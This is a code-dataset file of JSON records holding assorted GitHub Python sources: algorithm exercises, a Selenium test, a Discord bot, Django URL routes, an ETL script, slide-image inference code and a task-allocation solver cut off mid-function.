+{"seq_id":"3585816651","text":"data = [10, 20, 30, 40, 50]\nP = [0] * (len(data) + 1)\n\nfor i in range(len(data)):\n sum = 0\n for j in range(i + 1):\n sum += data[j]\n P[i + 1] = sum\n\nleft = int(input())\nright = int(input())\n\nresult = P[right] - P[left -1]\nprint(result)\n\ndata = [10, 20, 30, 40, 50]\nsum_value = 0\nprefix_sum = [0]\nfor i in data:\n sum_value += i\n prefix_sum.append(sum_value)\n\nleft = 3\nright = 4\nprint(prefix_sum[right] - prefix_sum[left - 1])","repo_name":"kkw2758/Algorithm","sub_path":"etc/구간 합.py","file_name":"구간 합.py","file_ext":"py","file_size_in_byte":431,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"35212111771","text":"import sys\nfrom collections import deque\ninput = sys.stdin.readline\n\nn = int(input())\ngraph = [[] for _ in range(n)]\nparent = list(map(int, input().split()))\nroot = -1\nfor i in range(n):\n if parent[i] == -1:\n root = i\n else:\n graph[parent[i]].append(i)\ndeleted = int(input())\nq = deque([root] if root != deleted else [])\ncount = 0\nwhile q:\n v = q.popleft()\n leaf = 0\n for i in graph[v]:\n if i != deleted:\n leaf += 1\n q.append(i)\n if not leaf:\n count += 1\nprint(count)\n","repo_name":"hyh1016/boj-with-python","sub_path":"python/search/1068.py","file_name":"1068.py","file_ext":"py","file_size_in_byte":536,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"40"} +{"seq_id":"9917038250","text":"#HLNCEC001\r\n#Question4\r\n#Assignment8\r\n#program that uses recursive functions to find all palindromic primes between two integers\r\nimport sys\r\nsys.setrecursionlimit (30000)\r\n\r\nnv = 0\r\nnv_2 = 0\r\n\r\ndef palindrom(s, e):\r\n global nv\r\n if s!=e:\r\n if str(s)[::1] == str(s)[::-1]:\r\n nv = s\r\n s+=1\r\n return palindrom(s, e)\r\n else:\r\n s+=1 \r\n return palindrom(s, e)\r\n\r\nc = 2\r\ndef prime(a,b):\r\n global nv_2\r\n global c\r\n if a<=b:\r\n if a%c == 0 and a!=c:\r\n a+=1\r\n return prime(a,b) \r\n elif a%c != 0:\r\n c+=1\r\n return prime(a,b)\r\n elif a%c==0 and a == c:\r\n nv_2 = a\r\n #print(a)\r\n a+=1\r\n c = 2\r\n return prime(a,b) and True\r\n return False\r\n\r\n\r\ndef main():\r\n s= eval(input('Enter the starting point N:\\n'))\r\n e= eval(input('Enter the ending point M:\\n')) \r\n if palindrom(s,e) == nv :\r\n a=s\r\n b=e\r\n #print(a)\r\n if prime(a,b) == nv_2 :\r\n print(nv_2,\"c\")\r\nmain()","repo_name":"MrHamdulay/csc3-capstone","sub_path":"examples/data/Assignment_8/hlncec001/question4.py","file_name":"question4.py","file_ext":"py","file_size_in_byte":1105,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"5205632516","text":"\"\"\"\nThis file contains the function that constructs the full potential grid from the\nsquare and diagonal parts.\n\"\"\"\n\n# ---------- Imports ----------#\nimport numpy as np\nfrom matrix_operations import anti_transpose\nfrom matrix_operations import complete_anti_diagonal_symmetric\n\n# ---------- Construct ----------#\ndef construct(Square_grid, Diagonal_grid):\n \"\"\"\n Constructs the full potential grid from the square and diagonal parts.\n \n Args:\n Square_grid (numpy.ndarray): The square part of the potential grid.\n Diagonal_grid (numpy.ndarray): The diagonal part of the potential grid.\n \n Returns:\n Potential_grid (numpy.ndarray): The full potential grid.\n \"\"\"\n # Extract the size of the grid\n L = len(Square_grid)\n\n # Initialize full grid\n Potential_grid = np.zeros((2*L, 2*L))\n\n # Add the sqaure parts\n Potential_grid[0:L, 0:L] = Square_grid\n Potential_grid[L:2*L, L:2*L] = anti_transpose(Square_grid)\n\n # Complete the diagonal matrix\n Potential_grid[L:2*L, 0:L] = complete_anti_diagonal_symmetric(Diagonal_grid)\n\n return Potential_grid\n","repo_name":"Emilis-Strazdas/PHY204_project","sub_path":"construct.py","file_name":"construct.py","file_ext":"py","file_size_in_byte":1113,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"3331595516","text":"import time\nimport math\nimport pytest\nfrom selenium import webdriver\n\n\n@pytest.fixture(scope=\"function\")\ndef browser():\n print(\"\\nstart browser for test..\")\n browser = webdriver.Chrome()\n browser.implicitly_wait(10)\n yield browser\n print(\"\\nquit browser..\")\n browser.quit()\n\n\nclass TestAliensMessage():\n\n\n urls = [\"236895\", \"236896\", \"236897\", \"236898\", \"236899\", \"236903\", \"236904\", \"236905\", ]\n\n\n @pytest.mark.parametrize(\"number_of_link\", urls)\n def test_scenario(self, browser, number_of_link):\n link = \"https://stepik.org/lesson/{}/step/1\".format(number_of_link)\n browser.get(link)\n answer = str(math.log(int(time.time())))\n browser.find_element_by_css_selector('.textarea.ember-view').send_keys(answer)\n browser.find_element_by_css_selector('.submit-submission').click()\n feedback = browser.find_element_by_css_selector('.smart-hints__feedback').text\n assert \"Correct!\" in feedback, f\"ожидался ответ 'Correct!', но был получен '{feedback}'\"\n\n# The owls are not what they seem! OvO","repo_name":"SkajenaSobaka/Selenium-Stepik","sub_path":"test_fixture_task2.py","file_name":"test_fixture_task2.py","file_ext":"py","file_size_in_byte":1088,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"20496020074","text":"import matplotlib.pyplot as plt\nimport pandas as pd\nfrom math import pi\n\ndef make_radar_chart(lst, filename=\"\"):\n categories = []\n values = []\n for i in lst:\n if i[0] not in categories:\n categories.append(i[0])\n values.append(0)\n index = categories.index(i[0])\n values[index] += i[1]\n # Weird quirk of matplotlib is the last one should be\n # a duplicate of the first one\n values += values[:1]\n n = len(categories)\n angles = [_ / float(n) * 2 * pi for _ in range(n)]\n angles += angles[:1]\n\n plt.polar(angles, values)\n plt.xticks(angles[:-1], categories)\n\n if filename:\n plt.savefig(filename)\n else:\n plt.show()\n\n\n","repo_name":"Diesel-Hadez/myhackathon","sub_path":"scripts/make_radar_chart.py","file_name":"make_radar_chart.py","file_ext":"py","file_size_in_byte":708,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"70388805241","text":"#!/usr/bin/python\n# watch pep8 --show-pep8 --ignore=E111,E114,E241,W391 ./vm.py\nimport threading\nimport time\n\n\nclass TimerWorker(threading.Thread):\n def __init__(self, vm):\n super(TimerWorker, self).__init__()\n self.vm = vm\n\n self.mutex = threading.Lock()\n self.alarm_time = 0\n self.activation_time = 0\n self.active = False\n self.shutdown = threading.Event()\n\n # This variable is used only in one thread (caller). No need to lock it.\n self.alarm = 0\n\n def set_alarm(self, miliseconds):\n self.alarm = miliseconds\n\n def activate(self):\n with self.mutex:\n self.activation_time = time.time()\n self.alarm_time = self.activation_time + self.alarm / 1000.0\n self.active = True\n\n def deactivate(self):\n with self.mutex:\n self.active = False\n\n def get_counter(self):\n with self.mutex:\n # We don't really have to count.\n res = int((time.time() - self.alarm_time) * 1000)\n return res\n\n def run(self):\n while not self.shutdown.is_set():\n self.mutex.acquire()\n if self.active and time.time() >= self.alarm_time:\n self.active = False\n self.mutex.release()\n self.vm.interrupt(self.vm.INT_PIT)\n else:\n self.mutex.release()\n\n time.sleep(0)\n\n\nclass VMDeviceTimer():\n def __init__(self, vm):\n self.worker = TimerWorker(vm)\n self.worker.start()\n self.control_register = 0\n\n self.remaining_counter_value = 0\n self.has_counter_data = False\n\n def handle_inbound(self, port, byte):\n if port == 0x71:\n self.worker.alarm = ((self.worker.alarm << 8) | byte) & 0xffff\n elif port == 0x70:\n activation_bit = byte & 1\n if activation_bit == 1:\n self.control_register = 1\n self.worker.activate()\n else:\n self.control_register = 0\n self.worker.deactivate()\n\n def handle_outbound(self, port):\n if port == 0x70:\n return self.control_register\n elif port == 0x71:\n if self.has_counter_data is False:\n counter = self.worker.get_counter()\n self.remaining_counter_value = (counter >> 8) & 0xff\n self.has_counter_data = True\n return counter & 0xff\n else:\n self.has_counter_data = False\n return self.remaining_counter_value\n\n def terminate(self):\n self.worker.shutdown.set()\n self.worker.join()\n","repo_name":"gynvael/zrozumiec-programowanie","sub_path":"007-Czesc_II-Rozdzial_3-Podstawy_architektury_komputerowe/vm_dev_timer.py","file_name":"vm_dev_timer.py","file_ext":"py","file_size_in_byte":2323,"program_lang":"python","lang":"en","doc_type":"code","stars":78,"dataset":"github-code","pt":"40"} +{"seq_id":"69964229240","text":"from __future__ import unicode_literals\nfrom django.conf.urls import url, include\nfrom django.conf import settings\nfrom . import views\nfrom .forms import ProfessorProfileForm\nfrom .models import ProfessorProfile, ExecutiveProfile\nfrom django.contrib.auth import views as auth_views\n\n# app_name = 'accounts'\n\nurlpatterns = [\n # url(r\"login/\", views.LoginView.as_view(), name=\"login\"),\n\n # prueba de curso 1.11.\n #url(r\"login/$\", auth_views.LoginView.as_view(template_name='accounts/login.html'), name='login'),\n\n #url(r\"logout/$\", auth_views.LogoutView.as_view(), name=\"logout\"),\n\n # verdadero\n url(r\"logout/$\", views.LogoutView.as_view(), name=\"logout\"),\n\n url(r\"signup/$\", views.SignUpView.as_view(), name=\"signup\"),\n url(r\"join/$\", views.signup, name=\"join\"),\n\n #url(r\"^preferences/(?P<pk>\\d+)$\",\n # views.AccountSettingsUpdateView.as_view(),\n # name='preferences'\n #),\n\n # basado en el usernames\n #url(r\"^profile/(?P<slug>[\\w\\-]+)/$\",\n # views.AccountProfilesView.as_view(),\n # name='profile'\n #),\n\n url(r\"^profile/u/(?P<slug>[\\w\\-]+)/$\",\n views.user_profile_update_view,\n name='profile'\n ),\n\n url(r\"^preferences/u/(?P<slug>[\\w.\\-]+)/$\",\n views.AccountSettingsUpdateView.as_view(),\n name='preferences'\n ),\n\n url(r\"^preferences/enterprise-user/@(?P<slug>[\\w.\\-]+)/$\",\n views.AccountSettingsEnterpriseUpdateView.as_view(),\n name='preference'\n ),\n\n\n #url(r\"^preferences/(?P<slug>[\\w.\\-]+)/$\",\n # views.AccountSettingsUpdateView.as_view(),\n # name='preferences'\n #),\n\n\n]\n\nif settings.DEBUG:\n import debug_toolbar\n urlpatterns = [\n url(r'^__debug__/', include(debug_toolbar.urls)),\n ] + urlpatterns\n","repo_name":"christiandiazleon/ihost_project","sub_path":"accounts/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1761,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"30984330233","text":"import discord\nfrom commands import *\nfrom messages import *\nfrom lounge import *\nfrom help_command import help_command_message\n\ntoken = 'YOUR_BOT_TOKEN_HERE'\nclient = discord.Client()\n\n@client.event\nasync def on_ready():\n await client.change_presence(activity=discord.Activity(type=discord.ActivityType.listening, name=help_command))\n\n@client.event\nasync def on_message(message):\n if not message.author.bot:\n if message.author in [lounge.owner for lounge in lounges]:\n lounge = [lounge for lounge in lounges if message.author == lounge.owner][0]\n else:\n lounge = None\n if message.content.startswith(create_lounge_command) and len(message.content.replace(create_lounge_command, '')) >= 1:\n if not lounge is None:\n await message.channel.send(embed=already_own_lounge_error(lounge.text_channels[0]))\n else:\n await Lounge(message.author, message.content.replace(create_lounge_command, ''), message.channel, message.guild).create_lounge()\n elif not lounge is None:\n if message.content == close_lounge_command:\n await lounge.close_lounge()\n elif message.content.startswith(add_text_channel_command) and len(message.content.replace(add_text_channel_command, '')) >= 1:\n await lounge.add_channel('text', message.content.replace(add_text_channel_command, ''), message.channel)\n elif message.content.startswith(add_voice_channel_command) and len(message.content.replace(add_voice_channel_command, '')) >= 1:\n await lounge.add_channel('voice', message.content.replace(add_voice_channel_command, ''), message.channel)\n elif message.content.startswith(remove_channel_command) and len(message.content.replace(remove_channel_command, '')) >= 1:\n await lounge.remove_channel(message.content.replace(remove_channel_command, ''), message.channel)\n elif message.content.startswith(invite_command) and len(message.content.replace(invite_command, '')) >= 1:\n await lounge.invite(message.mentions, message.channel)\n elif message.content.startswith(kick_command) and len(message.content.replace(kick_command, '')) >= 1:\n await lounge.kick(message.mentions, message.channel)\n elif message.content == help_command:\n await message.channel.send(embed=help_command_message(client.user))\n elif message.content.startswith(command_prefix):\n await message.channel.send(embed=not_lounge_owner_error)\n\nclient.run(token)\n","repo_name":"sohandillikar/DiscordLoungeBot","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2587,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"29054806529","text":"import sqlite3\nimport numpy\nimport glob\nfrom datetime import datetime\nimport pandas as pd\nimport sqlalchemy\nimport matplotlib.pyplot as plt\n\n\n'''Procesos de ETL'''\ncount =0\n\ndef extraer_database(path):\n\n motorDB = sqlalchemy.create_engine(path)\n conectarDB = motorDB.connect()\n\n return motorDB, conectarDB\n\ndef extraer_tabla_a_pandas(conectarDB):\n\n query = '''SELECT C.FirstName AS [NOMBRE CLIENTE],\n MAX(T.Name) AS [PISTA],\n MAX(G.Name) AS [GENERO],\n MIN(PL.Name) AS [LISTA DE REPRODUCIÓN MENOS ESCUCHADA],\n COUNT(I.InvoiceId) AS [CANTIDAD DE FACTURAS],\n AVG(I.InvoiceId) AS [PROMEDIO DE FACTURAS],\n SUM(I.Total) AS TOTAL\n FROM employees E\n INNER JOIN customers C ON C.SupportRepId = E.EmployeeId\n INNER JOIN invoices I ON I.CustomerId = C.CustomerId\n INNER JOIN invoice_items IV ON IV.InvoiceId = I.InvoiceId\n INNER JOIN tracks T ON T.TrackId = IV.TrackId\n INNER JOIN media_types M ON M.MediaTypeId = T.MediaTypeId\n INNER JOIN genres G ON G.GenreId = T.GenreId\n INNER JOIN albums A ON A.AlbumId = T.AlbumId\n INNER JOIN artists AR ON AR.ArtistId = A.ArtistId\n INNER JOIN playlist_track P ON P.TrackId = T.TrackId\n INNER JOIN playlists PL ON PL.PlaylistId = P.PlaylistId\n GROUP BY 1\n ORDER BY SUM(I.Total) DESC\n LIMIT 5;'''\n result = conectarDB.execute(query)\n\n df = pd.DataFrame(result.fetchall())\n df.columns = result.keys()\n\n return df\n\ndef transformar_facturacion_promedio(datos):\n\n # Cálculo de promedio por País\n df_g = datos.groupby(['BillingCountry'])[['Total']].mean()\n df_g = df_g.reset_index()\n df_g.rename(columns={\"Total\": \"Promedio\"}, inplace=True)\n\n df = datos.merge(df_g, how=\"left\", left_on=\"BillingCountry\",\n right_on=\"BillingCountry\")\n\n return df\n\ndef transformar_rellenar_nulo(datos):\n\n # Procesamiento de completar los valores faltantes\n datos = datos.fillna({\"BillingState\": \"NA\", \"BillingPostalCode\": \"99999\"})\n\n return datos\n\ndef transformar_formato(datos):\n #df = pd.DataFrame({'InvoiceDate': '%d-%m-%Y'})\n\n datetime.strftime(datos.InvoiceDate, format='%d-%m-%Y')\n return datos\n\ndef exportar_csv(archivo_de_destino,df):\n df.to_csv(archivo_de_destino)\n\ndef cargar_a_sql(datos, connectar, tabla_sqlite):\n\n # Procesamiento de completar los valores faltantes\n\n datos.to_sql(tabla_sqlite, connectar, if_exists='fail')\n connectar.close()\n return 'La carga ha terminado'\n\nif __name__ == '__main__':\n path = \"sqlite:///chinook.db\"\n #ruta_destino = r'C:\\Users\\Usuario\\Desktop\\PROYECTO_MDB\\consulta1.csv'\n # Extracción\n extraerBD = extraer_database(path)\n\n #nombre_de_tabla = 'Invoices'\n engine = extraerBD[0]\n extraer = extraer_tabla_a_pandas(engine)\n\n # Transformación\n #transformar = transformar_facturacion_promedio(extraer)\n #transformar = transformar_rellenar_nulo(transformar)\n\n # carga de los datos\n datos = extraer\n conectar = extraerBD[1]\n tabla_sqlite = \"ETL\"\n nombre_tabla = \"ETL.csv\"\n exportar_csv(nombre_tabla,datos)\n cargar_a_sql(datos, conectar, tabla_sqlite)\n print(extraer)\n","repo_name":"wilmerxx/PROYECTO_MDB","sub_path":"controller.py","file_name":"controller.py","file_ext":"py","file_size_in_byte":3344,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"24066930514","text":"'''\nНаписать функцию num_translate(), переводящую числительные от 0 до 10 c английского на\nрусский язык. Например:\n//>>> num_translate(\"one\")\n\"один\"\n//>>> num_translate(\"eight\")\n\"восемь\"\nЕсли перевод сделать невозможно, вернуть None. Подумайте, как и где лучше хранить\nинформацию, необходимую для перевода: какой тип данных выбрать, в теле функции или\nснаружи.\n'''\n\n\"\"\"\nХод мысли:\nНаписать словарь соответсвия, где ключ - слово на английском, а значение слово на русском. Чтобы не было ошибки\nвоспользовать get, только вот вопрос где, можем при выводе?. А как сделать перевод в обе стороны и исключить ошибку \nпо вводу заглавных букв + выввести слово с заглавной буквы \n\"\"\"\n\n\ndef num_translate(number: str):\n translate_dict_to_en = {}\n translate_dict_to_ru = {\n 'one': 'один',\n 'zero': 'ноль',\n 'two': 'два',\n 'three': 'три',\n 'four': 'четыре',\n 'five': 'пять',\n 'six': 'шесть',\n 'seven': 'семь',\n 'eight': 'восемь',\n 'nine': 'девять',\n 'ten': 'десять'\n }\n for key, value in translate_dict_to_ru.items():\n translate_dict_to_en[value] = key\n if translate_dict_to_en.get(number.lower()):\n return translate_dict_to_en[number.lower()].capitalize()\n else:\n return translate_dict_to_ru.get(number.lower()).capitalize()\n\n\nif __name__ == \"__main__\":\n print(num_translate('one'))\n print(num_translate('eight'))\n\n\n","repo_name":"Gefahr87/Tatarenko_Vitaly_dz","sub_path":"Python/Task_3/Task_3_1.py","file_name":"Task_3_1.py","file_ext":"py","file_size_in_byte":1935,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"22676996826","text":"from pathlib import Path\n\n\nfrom collections import defaultdict\n\nimport numpy as np\nimport pandas as pd\nfrom pathlib import Path\nfrom tqdm import tqdm\n\nimport pandas as pd\nfrom torch.utils.data import DataLoader\n\n\nfrom wsilearn.utils.cool_utils import read_json_dict, mkdir, Timer, is_string_or_path\nfrom wsilearn.dataconf import DataConf, TrainType\nfrom wsilearn.dl.pl.pl_inference import find_pl_model_path, load_pl_state_dict, InferenceOutWriter, Inferencer\nfrom wsilearn.compress.compressed_dataset import CompressedDataset\nfrom wsilearn.nic_utils import create_nic_model, HeatmapWriter\n\nfrom wsilearn.compress.compress import compress\n\nfrom wsilearn.utils.cool_utils import save_arrays, mkdir, list_intersection, dict_agg_type\nfrom wsilearn.dataconf import TrainType\nfrom wsilearn.utils.df_utils import unique_one, df_concat, df_save, print_df\nfrom wsilearn.utils.path_utils import PathUtils\nfrom wsilearn.nic_utils import HeatmapWriter\n\n\ndef combine_out(eval_dirs, out_dir, overwrite=False):\n print('combining %s' % str(eval_dirs))\n name_pathes_map = defaultdict(list)\n for ev in eval_dirs:\n ev = Path(ev)\n outs = PathUtils.list_pathes(ev, ending='npz')\n if len(outs)==0:\n ev = Path(ev)/'out_npz'\n outs = PathUtils.list_pathes(ev, ending='npz')\n for out in outs:\n name_pathes_map[out.stem].append(str(out))\n lens = [len(v) for k,v in name_pathes_map.items()]\n lens_unique = np.unique(lens)\n if len(lens_unique)!=1 or lens_unique[0]<2:\n raise ValueError('invalid unique pathes', lens_unique)\n\n mkdir(Path(out_dir))\n for name, pathes in tqdm(name_pathes_map.items()):\n out_path = Path(out_dir)/(name+'.npz')\n if out_path.exists() and not overwrite:\n continue\n contents = [np.load(str(path)) for path in pathes]\n agg = dict_agg_type(contents, number_unique=True, string_unique=True, rest_unique=True,\n only_common_keys=True, ignore_keys=['image','path'])\n keys = list(agg.keys())\n save_arrays(out_path, **agg)\n print('Done!')\n\ndef combine_predictions(eval_dirs, out_dir, overwrite=False, id='name'):\n fnames = ['out.csv', 'predictions.csv']\n\n for fname in fnames:\n ppathes = [Path(ev)/fname for ev in eval_dirs]\n out_path = Path(out_dir)/fname\n if out_path.exists() and not overwrite or not ppathes[0].exists():\n continue\n dfs = [pd.read_csv(ppath) for ppath in ppathes]\n # for i,df in enumerate(dfs):\n # fold_name = eval_dirs[i].split('fold')[-1].split('/')[0]\n # df['fold'] = fold_name\n df = df_concat(*dfs)\n\n cols = [str(c) for c in df.columns if c not in ['path','image']]\n out_cols = [c for c in cols if c.startswith('out') or c.startswith('pred')]\n agg = {c:(c,unique_one) for c in cols}\n agg.update({c:(c,np.mean) for c in out_cols})\n agg.update({c+'_std':(c,np.std) for c in out_cols})\n df = df.groupby(id).agg(**agg)\n assert len(df)==len(dfs[0])\n # print_df(df.head())\n df_save(df, out_path)\n print(str(out_path))\n\n\ndef create_combined_heatmaps(npz_dir, out_dir, train_type, wsi_dir=None, overwrite=False, no_links=False):\n # rec = dfp.to_dict('records')[0]\n hm_writer = HeatmapWriter(npz_dir=npz_dir, overwrite=overwrite, no_links=no_links, train_type=train_type)\n npzs = PathUtils.list_pathes(npz_dir, ending='npz')\n mkdir(out_dir)\n for npz in tqdm(npzs):\n kwargs = {}\n if wsi_dir is not None:\n kwargs['wsi_path'] = Path(wsi_dir)/(npz.stem+'.tif')\n hm_writer.save_hm_and_patches_with(name=npz.stem, out_dir=out_dir, **kwargs)\n\n\nclass NicInference(object):\n def __init__(self, model_dir, pack=False, overwrite=False, no_links=False, hmraw=False,\n compress_batch_size=32, compress_multiproc=False, compress_args=None, num_workers=0,\n skip_compression=False):\n self.model_dir = Path(model_dir)\n self.overwrite = overwrite\n self.pack = pack\n\n self.no_links = no_links\n self.hmraw = hmraw\n\n results = read_json_dict(self.model_dir/ 'results.json')\n self.clf_thresholds = results.get('validation',{}).get('clf_thresholds',None)\n self.args = read_json_dict(self.model_dir/ 'args.json')\n self.train_type = self.args['train_type']\n self.target_names = self.args.get('class_names',self.args.get('target_names'))\n\n net_conf = self.args['net_conf']\n self.code_size = self.args['enc_dim']\n self.fp16 = self.args.get('precision',None)==16\n if compress_args is None:\n self.compress_args = read_json_dict(self.model_dir/ 'compress_args.json')\n elif is_string_or_path(compress_args):\n self.compress_args = read_json_dict(compress_args)\n else:\n self.compress_args = compress_args\n self.compress_args['batch_size'] = compress_batch_size\n # if self.compress_args.get('multiproc',False):\n self.compress_args['multiproc'] = compress_multiproc\n self.skip_compression = skip_compression\n\n self.model = create_nic_model(**net_conf)\n model_path = find_pl_model_path(self.model_dir)\n load_pl_state_dict(model_path, self.model, replacements={'att_net.attention_a':'att_net.att_m',\n 'att_net.attention_b':'att_net.att_gate',\n 'att_net.attention_c':'att_net.att_last'})\n\n self.num_workers = num_workers\n\n # self.device = create_device()\n\n def _pack(self, slide, mask, out_dir):\n raise ValueError('implement caling packing')\n\n def _compress(self, slide_path, mask_path, out_dir):\n cargs = self.compress_args.copy()\n cargs.update(dict(out_dir=out_dir, multiproc=False, thumbs=False, overwrite=self.overwrite),\n data=str(slide_path), mask_dir=str(mask_path))\n out_format = self.compress_args.get('out_format','h5')\n # ok = compress(slide_path, mask_dir=mask_path, **cargs)\n ok = compress(**cargs)\n if not ok:\n raise ValueError('compression of %s failed, params %s' % (str(slide_path), self.compress_args))\n compressed_path = Path(out_dir)/(Path(slide_path).stem+'.'+out_format)\n return compressed_path\n\n def apply(self, slide_path=None, mask_path=None, compressed_path=None, out_dir=None, no_hm=False):\n if compressed_path is None and slide_path is None:\n raise ValueError('either slide or compressed have to be specified')\n\n if out_dir is None:\n out_dir = Path(self.model_dir)/'apply'\n else:\n out_dir = Path(out_dir)\n\n if compressed_path is None:\n if mask_path is None:\n print('Warning! no masks')\n\n if self.pack and mask_path is not None:\n slide_path, mask_path = self._pack(slide_path, mask_path, out_dir/'packed')\n\n compressed_path = self._compress(slide_path, mask_path, out_dir=out_dir/'compressed')\n\n slide_name = Path(slide_path).stem\n target_names = self.args['target_names'] if 'target_names' in self.args else self.args['class_names']\n dummy_entry = {DataConf.name_col:slide_name, DataConf.image_col:str(slide_path), DataConf.split_col:'testing'}\n for tn in target_names:\n dummy_entry[tn] = 1\n dummydf = pd.DataFrame([dummy_entry])\n data_conf = DataConf(dummydf, train_type=self.train_type, target_names=target_names)\n compressed_dir = str(Path(compressed_path).parent.absolute())\n\n\n ds = CompressedDataset(compressed_dir, data_conf=data_conf, split='testing', flat=False, convert_f32=self.args.get('fp16',None) in [False, None])\n loader = DataLoader(ds, batch_size=1, num_workers=self.num_workers)\n\n dfp = self._apply_loader(loader, out_dir)\n\n rec = dfp.to_dict('records')[0]\n rec['compressed'] = compressed_path\n if not no_hm:\n hm_writer = HeatmapWriter(npz_dir=out_dir, overwrite=self.overwrite, no_links=self.no_links,\n hmraw=self.hmraw, train_type=self.train_type)\n hm_writer.save_hm_and_patches(rec, out_dir, data_conf.get_target_cols())\n\n hm_path = hm_writer.history_hm_pathes[slide_name][0]\n rec['hm_path'] = str(Path(hm_path).absolute())\n return rec\n\n def _apply_loader(self, loader, out_dir):\n inf_out_writer = InferenceOutWriter(overwrite=self.overwrite)\n inferencer = Inferencer(self.model, post_fct=TrainType.post_fct(self.train_type), overwrite=self.overwrite,\n callbacks=[inf_out_writer], fp16=self.fp16)\n dfp = inferencer.apply(loader, out_dir)\n print_df(dfp)\n return dfp\n\n def apply_config(self, config, overwrite=False, compressed_dir=None, out_dir=None):\n if compressed_dir is None:\n compressed_dir = out_dir/'compressed'\n mkdir(compressed_dir)\n if not self.skip_compression:\n cargs = self.compress_args.copy()\n cargs.update(dict(out_dir=out_dir, thumbs=False, overwrite=self.overwrite))\n # out_format = self.compress_args.get('out_format','h5')\n ok = compress(config, overwrite=overwrite, **cargs)\n\n\n\n def _get_last_model_path(self):\n return find_pl_model_path(self.out_dir, last=True)\n # return Path(self.out_dir)/'last.ckpt'\n\n","repo_name":"DIAGNijmegen/pathology-whole-slide-learning","sub_path":"wsilearn/apply_nic.py","file_name":"apply_nic.py","file_ext":"py","file_size_in_byte":9569,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"22857689505","text":"import numpy as np\n\n\ndef gcaa_solution(agents, G, tasks_cells):\n na = agents[\"N\"]\n pos_a = agents[\"Pos\"]\n\n nt = tasks_cells[\"N\"]\n pos_t = tasks_cells[\"Pos\"]\n\n # Initialize global variables\n\n # Initialize GCAA parameters\n GCAA_Params = gcaa_init(0, 0, tasks_cells[\"prob_a_t\"], tasks_cells[\"lambda\"])\n\n # Define agents and tasks\n\n # Define agent default fields\n agent_default = {\n \"id\": 0,\n \"type\": 0,\n \"avail\": 0,\n \"clr\": [],\n \"x\": 0,\n \"y\": 0,\n \"z\": 0,\n \"nom_vel\": 0,\n \"fuel\": 0,\n \"Lt\": 0,\n \"v_a\": [0, 0],\n \"rin_task\": [],\n \"vin_task\": [],\n \"previous_task\": [],\n \"previous_winnerBids\": [],\n \"kdrag\": 0,\n }\n\n # Define task default fields\n task_default = {\n \"id\": 0,\n \"type\": 0,\n \"value\": 0,\n \"start\": 0,\n \"end\": 0,\n \"duration\": 0,\n \"tf\": 0,\n \"x\": 0,\n \"y\": 0,\n \"z\": 0,\n \"Speed\": 0,\n \"radius\": 0,\n \"tloiter\": 0,\n }\n\n # Create default agents and tasks\n agent_quad = agent_default.copy()\n agent_quad[\"type\"] = GCAA_Params[\"AGENT_TYPES\"][\"QUAD\"]\n\n task_track = task_default.copy()\n task_track[\"type\"] = GCAA_Params[\"TASK_TYPES\"][\"TRACK\"]\n\n # Create random agents\n agents_list = []\n for n in range(na):\n agent = agent_quad.copy()\n agent[\"id\"] = n + 1\n agent[\"x\"] = pos_a[n, 0]\n agent[\"y\"] = pos_a[n, 1]\n agent[\"v_a\"] = agents[\"v_a\"][n]\n agent[\"Lt\"] = agents[\"Lt\"][n]\n agent[\"rin_task\"] = []\n agent[\"vin_task\"] = []\n agent[\"previous_task\"] = agents[\"previous_task\"][n]\n agent[\"previous_winnerBids\"] = agents[\"previous_winnerBids\"][n]\n agent[\"kdrag\"] = agents[\"kdrag\"]\n agents_list.append(agent)\n\n # Create random tasks\n tasks_list = []\n for m in range(nt):\n task = task_track.copy()\n task[\"id\"] = m + 1\n task[\"x\"] = pos_t[m, 0]\n task[\"y\"] = pos_t[m, 1]\n task[\"tf\"] = tasks_cells[\"tf\"][m]\n task[\"value\"] = tasks_cells[\"r_bar\"][m]\n task[\"Speed\"] = tasks_cells[\"Speed\"][m]\n task[\"type\"] = tasks_cells[\"task_type\"][m]\n task[\"radius\"] = tasks_cells[\"radius\"][m]\n task[\"tloiter\"] = tasks_cells[\"tloiter\"][m]\n tasks_list.append(task)\n\n # Run GCAA\n GCAA_Assignments, S_GCAA_agents, S_GCAA_ALL_agents, agents_list = gcaa_main(\n agents_list, tasks_list, G, tasks_cells[\"prob_a_t\"], tasks_cells[\"lambda\"]\n )\n\n p = []\n for i in range(na):\n path = GCAA_Assignments[i][\"path\"]\n ind = np.where(path == -1)[0]\n if len(ind) > 0:\n path = path[: ind[0]]\n p.append(path.tolist())\n\n winners = np.zeros(na)\n for i in range(na):\n if len(p[i]) > 0:\n winners[i] = p[i][0]\n\n winners_matrix = winner_vector_to_matrix(na, nt, winners)\n\n S_GCAA_ALL = np.zeros(nt)\n rt = np.zeros(nt)\n for j in range(nt):\n S_GCAA_ALL[j] = calc_task_utility(\n agents[\"Pos\"],\n agents[\"v_a\"],\n tasks_cells[\"Pos\"][j],\n tasks_cells[\"Speed\"][j],\n tasks_cells[\"tf\"][j],\n tasks_cells[\"r_bar\"][j],\n j + 1,\n tasks_cells[\"prob_a_t\"],\n winners_matrix,\n tasks_cells[\"lambda\"],\n agents[\"kdrag\"],\n )\n rt[j] = tasks_cells[\"r_bar\"][j] * (\n 1 - np.prod(1 - winners_matrix[:, j] * tasks_cells[\"prob_a_t\"][:, j])\n )\n\n S_GCAA = np.sum(S_GCAA_ALL)\n\n # 